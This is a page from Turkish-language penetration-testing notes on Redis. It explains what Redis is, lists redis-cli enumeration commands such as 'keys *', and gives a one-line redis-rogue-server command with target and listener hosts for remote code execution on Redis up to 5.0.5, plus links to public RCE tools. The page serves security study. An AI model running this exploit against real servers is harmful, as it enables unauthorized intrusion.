🖥️
Siber Güvenlik Notları
  • WHOAMI
    • 👨‍💻Who Am I?
  • 🔭Information Gathering
    • Pentest VM Setup
    • Passive Information Gathering
    • Subdomain Enumeration
    • Host Discovery
    • Port Scanning
    • Email Enumeration
    • Leaked Passwords
    • Zafiyet Araştırma
  • 🪟Windows Pentesting
    • Windows Privilege Escalation
    • Windows Persistence
    • Windows Lateral Movement
    • AV Evasion
  • 🐧Linux Pentesting
    • Linux Privilege Escalation
    • Linux Persistence
    • Linux Lateral Movement
  • 🕸️Web Application Pentesting
    • Web Pentest Checklist
    • SQL Injection
    • NoSQL Injection
    • OS Command Injection
    • XXE Injection
    • SSTI
    • XSS
    • CSRF
    • SSRF
    • LFI/RFI
    • Insecure Deserialization
    • CORS Misconfiguration
    • Directory Traversal
    • File Upload
    • Broken Authentication
    • Broken Access Control
    • Business Logic
    • Race Conditions
    • Web Cache Deception
    • AWS Testing
    • Web Cache Poisoning
    • Clickjacking
    • API Testing
    • Broken Link Hijacking
    • HTTP Request Smuggling
    • LLM
    • HTTP Host Header Attack
    • OAuth Zafiyetleri
    • GraphQL API
    • HTTP Parameter Pollution
    • Configuration and Deployment Management Testing
    • Information Disclosure
    • Prototype pollution
    • JWT
  • 🖲️Network Service Pentesting
    • 📘Active Directory Services
      • Bleeding Edge Vulns
      • Misconfigs
      • Domain Trust
      • DNS (53)
      • Kerberos (88)
      • LDAP (389,636)
      • RPC WMI (135)
      • SMB (445)
      • WinRM - 5985
    • 📂FTP - 21
    • 🔐SSH - 22
    • 🤣Telnet - 23
    • SMTP - 25
    • TFTP - 69 UDP
    • HTTP - 80,443
      • Apache
      • Joomla
      • Drupal
      • Wordpress
      • WEBDAV
      • PHP
      • Laravel
    • IMAP/POP3 - 110,143,993,995
    • SNMP - 161
    • Rservices - 512
    • IPMI - 623
    • Rsync - 873
    • MSSQL - 1433
    • Oracle TNS - 1521
    • NFS - 2049
    • Docker
    • Grafana - 3000
    • MySQL - 3306
    • RDP - 3389
    • Postgresql - 5432
    • Redis - 6379
    • JDWP - 8000
    • MongoDB - 27017
  • 🕸️Network Pentesting
    • ARP Poisoning
  • 📞Android Pentesting
    • Android Derleme Süreci
    • Reversing
    • Rooting
    • Burp Suite Sertifikası
    • SSL Pinning Bypass
    • Patching
    • MobSF Kurulumu
    • Flutter Pentesting
  • 📰Teori
    • Güvenlik Ürünleri
    • OSI
    • Security Principles
  • Diger
    • Hacking Gadgets
      • Wifi Pineapple
      • Pwnagotchi
    • Stego
    • Buffer Overflow
    • Phishing
    • Nessus
    • DDOS Attacks
    • MSFConsole
  • ⏪Reverse
    • GCC Reverse
    • Python Reverse
    • Flare VM
    • Remnux
  • 🛜Wireless Pentesting
    • Wireless Pentest
    • Wireless V2
Powered by GitBook
On this page
  • Redis Nedir?
  • Redis Bağlantısı
  • Redis RCE (<=5.0.5)
  • Redis RCE (4.x/5.x)

Was this helpful?

  1. Network Service Pentesting

Redis - 6379

PreviousPostgresql - 5432NextJDWP - 8000

Last updated 5 months ago

Was this helpful?

Redis Nedir?

Redis (Remote Dictionary Server), bellek içinde çalışan bir veri yapısı sunucusudur ve açık kaynak kodlu bir veritabanıdır. Redis, yüksek performanslı, yüksek kullanılabilirlik sağlayan, düşük gecikme süreleriyle bilinen bir NoSQL veritabanıdır. Redis, verileri bellek içinde (RAM) saklayarak çok hızlı okuma ve yazma işlemleri yapabilir, bu yüzden cache (önbellek) olarak da sıkça kullanılır.

Redis Bağlantısı

redis-cli -h 192.168.1.2  # Belirtilen IP adresindeki Redis sunucusuna bağlanır.

help # Tüm komutların listesini ve açıklamalarını gösterir.
ping # Sunucunun çalıştığını kontrol eder, "PONG" döner.
info # Sunucu hakkında ayrıntılı bilgi verir.
monitor # Tüm işlemleri gerçek zamanlı izler.
keys * # Tüm anahtarları listeler.
get example_key # 'example_key' anahtarının değerini getirir.

Redis RCE (<=5.0.5)

RedisRogueServer:

./redis-rogue-server.py --rhost 192.168.1.3 --lhost 192.168.1.2

Redis RCE (4.x/5.x)

Link:

🖲️
https://github.com/n0b0dyCN/redis-rogue-server
https://github.com/Ridter/redis-rce